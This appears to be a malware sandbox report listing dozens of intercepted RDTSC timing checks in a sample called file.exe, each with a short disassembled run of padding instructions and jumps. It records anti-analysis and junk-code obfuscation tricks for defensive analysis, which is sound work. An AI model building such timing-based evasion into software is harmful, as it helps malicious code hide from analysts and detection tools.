          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E08140 second address: E08146 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E08146 second address: E08156 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F0820DCC6AAh 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E08156 second address: E0815C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0815C second address: E08173 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F0820DCC6ABh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E082B3 second address: E082DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F0821212AF0h 0x0000000c jne 00007F0821212AE6h 0x00000012 pop eax 0x00000013 popad 0x00000014 jp 00007F0821212AEEh 0x0000001a push esi 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E08442 second address: E08446 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E08446 second address: E0844A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E085B2 second address: E085B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E085B8 second address: E085BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E085BD second address: E085C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E089EF second address: E089F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E089F3 second address: E089FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E089FC second address: E08A14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 popad 0x0000000a jc 00007F0821212AF2h 0x00000010 jp 00007F0821212AECh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAD0DB second address: DAD0E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAD0E3 second address: DAD0E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0CC8F second address: E0CC99 instructions: 0x00000000 rdtsc 0x00000002 js 00007F0820DCC6A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0CC99 second address: E0CCB5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0821212AF7h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCDA3C second address: DCDA4D instructions: 0x00000000 rdtsc 0x00000002 jns 00007F0820DCC6A8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push ecx 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCDC3E second address: DCDC44 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCDC44 second address: DCDC4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCDC4A second address: DCDCFA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c jmp 00007F0821212AF5h 0x00000011 mov eax, dword ptr [eax] 0x00000013 push ecx 0x00000014 jmp 00007F0821212AF6h 0x00000019 pop ecx 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e jmp 00007F0821212AEBh 0x00000023 pop eax 0x00000024 call 00007F0821212AE9h 0x00000029 push ecx 0x0000002a push edx 0x0000002b pushad 0x0000002c popad 0x0000002d pop edx 0x0000002e pop ecx 0x0000002f push eax 0x00000030 jmp 00007F0821212AECh 0x00000035 mov eax, dword ptr [esp+04h] 0x00000039 jnc 00007F0821212AEEh 0x0000003f mov eax, dword ptr [eax] 0x00000041 push edx 0x00000042 jmp 00007F0821212AF9h 0x00000047 pop edx 0x00000048 mov dword ptr [esp+04h], eax 0x0000004c push eax 0x0000004d push edx 0x0000004e jp 00007F0821212AF4h 0x00000054 jmp 00007F0821212AEEh 0x00000059 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCDE5F second address: DCDE8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F0820DCC6ACh 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e jmp 00007F0820DCC6AFh 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 push esi 0x00000019 pop esi 0x0000001a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCDF38 second address: DCDF3E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCE797 second address: DCE7BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0820DCC6B8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d pushad 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCE892 second address: DCE8D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0821212AEAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov edx, 641E4B3Ch 0x00000011 lea eax, dword ptr [ebp+1248435Ch] 0x00000017 pushad 0x00000018 clc 0x00000019 je 00007F0821212AE8h 0x0000001f pushad 0x00000020 popad 0x00000021 popad 0x00000022 nop 0x00000023 push edx 0x00000024 pushad 0x00000025 jmp 00007F0821212AF3h 0x0000002a pushad 0x0000002b popad 0x0000002c popad 0x0000002d pop edx 0x0000002e push eax 0x0000002f push eax 0x00000030 push edx 0x00000031 push esi 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCE8D9 second address: DCE8DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCE8DE second address: DCE946 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0821212AF7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a sub ch, 0000007Bh 0x0000000d lea eax, dword ptr [ebp+12484318h] 0x00000013 push 00000000h 0x00000015 push eax 0x00000016 call 00007F0821212AE8h 0x0000001b pop eax 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 add dword ptr [esp+04h], 0000001Ah 0x00000028 inc eax 0x00000029 push eax 0x0000002a ret 0x0000002b pop eax 0x0000002c ret 0x0000002d xor dh, 00000021h 0x00000030 nop 0x00000031 jmp 00007F0821212AF3h 0x00000036 push eax 0x00000037 pushad 0x00000038 jl 00007F0821212AECh 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCE946 second address: DAD0DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0820DCC6B1h 0x00000009 popad 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push ecx 0x0000000e call 00007F0820DCC6A8h 0x00000013 pop ecx 0x00000014 mov dword ptr [esp+04h], ecx 0x00000018 add dword ptr [esp+04h], 0000001Ah 0x00000020 inc ecx 0x00000021 push ecx 0x00000022 ret 0x00000023 pop ecx 0x00000024 ret 0x00000025 call dword ptr [ebp+122D261Ch] 0x0000002b push ebx 0x0000002c jo 00007F0820DCC6ACh 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0D43E second address: E0D444 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0D444 second address: E0D44A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E10D11 second address: E10D15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E10D15 second address: E10D1B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1249C second address: E124A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F0821212AECh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E147D0 second address: E14804 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0820DCC6AAh 0x00000007 jns 00007F0820DCC6C0h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E14804 second address: E1480A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1480A second address: E1480E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1480E second address: E14824 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0821212AF0h 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D893DD second address: D893E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1741B second address: E1743E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0821212AF8h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b pop eax 0x0000000c push edi 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E175B7 second address: E175CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F0820DCC6AAh 0x0000000b jng 00007F0820DCC6A6h 0x00000011 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E175CD second address: E175EC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F0821212AECh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jl 00007F0821212AE6h 0x00000016 push eax 0x00000017 pop eax 0x00000018 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E175EC second address: E17605 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0820DCC6B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E17605 second address: E1760B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1774F second address: E17753 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E178B9 second address: E178C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1E8AA second address: E1E8BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0820DCC6ABh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1D12E second address: E1D145 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0821212AF3h 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1D145 second address: E1D174 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0820DCC6B5h 0x00000007 jmp 00007F0820DCC6B6h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1D174 second address: E1D192 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0821212AE8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007F0821212AECh 0x00000016 pop esi 0x00000017 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1D192 second address: E1D198 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1D198 second address: E1D19C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1D32D second address: E1D331 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1D642 second address: E1D648 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1D648 second address: E1D64C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1D64C second address: E1D650 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1D650 second address: E1D670 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jo 00007F0820DCC6BEh 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 pop edx 0x00000012 jmp 00007F0820DCC6AEh 0x00000017 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1D7AC second address: E1D7CE instructions: 0x00000000 rdtsc 0x00000002 jns 00007F0821212AE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0821212AF6h 0x00000011 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1D7CE second address: E1D7D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1D7D6 second address: E1D7DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1D7DA second address: E1D7E4 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F0820DCC6A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1DADD second address: E1DAEC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 js 00007F0821212AE6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E21D95 second address: E21DA4 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F0820DCC6AAh 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E21EEA second address: E21EF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E21EF0 second address: E21EF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E21EF4 second address: E21EFA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E21EFA second address: E21F27 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0820DCC6B9h 0x00000008 jmp 00007F0820DCC6AFh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E21F27 second address: E21F32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E21F32 second address: E21F38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E21F38 second address: E21F43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E21F43 second address: E21F47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E21F47 second address: E21F62 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F0821212AEFh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E21F62 second address: E21F66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E220F8 second address: E220FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E22717 second address: E2271C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E2271C second address: E22745 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F0821212AE6h 0x0000000a pop ecx 0x0000000b jmp 00007F0821212AF7h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E26A9F second address: E26AAA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007F0820DCC6A6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E2D133 second address: E2D159 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0821212AF7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c jp 00007F0821212AE6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E2D159 second address: E2D15D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E2D15D second address: E2D161 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E2D2BF second address: E2D2C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F0820DCC6A6h 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E2D2C9 second address: E2D2D3 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F0821212AE6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E2D9FB second address: E2DA13 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0820DCC6AEh 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E2DF7C second address: E2DF82 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E2DF82 second address: E2DF8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E2E79A second address: E2E7B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F0821212AF4h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E2EAB8 second address: E2EAC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F0820DCC6A6h 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E2EAC2 second address: E2EAC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E2EAC6 second address: E2EAD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jg 00007F0820DCC6A8h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E2EAD6 second address: E2EADB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E2EADB second address: E2EAE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E2EAE1 second address: E2EAEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E2EAEC second address: E2EAF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E33383 second address: E3339C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0821212AF5h 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3339C second address: E333A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E32678 second address: E3268D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007F0821212AEAh 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E32C29 second address: E32C39 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F0820DCC6A6h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
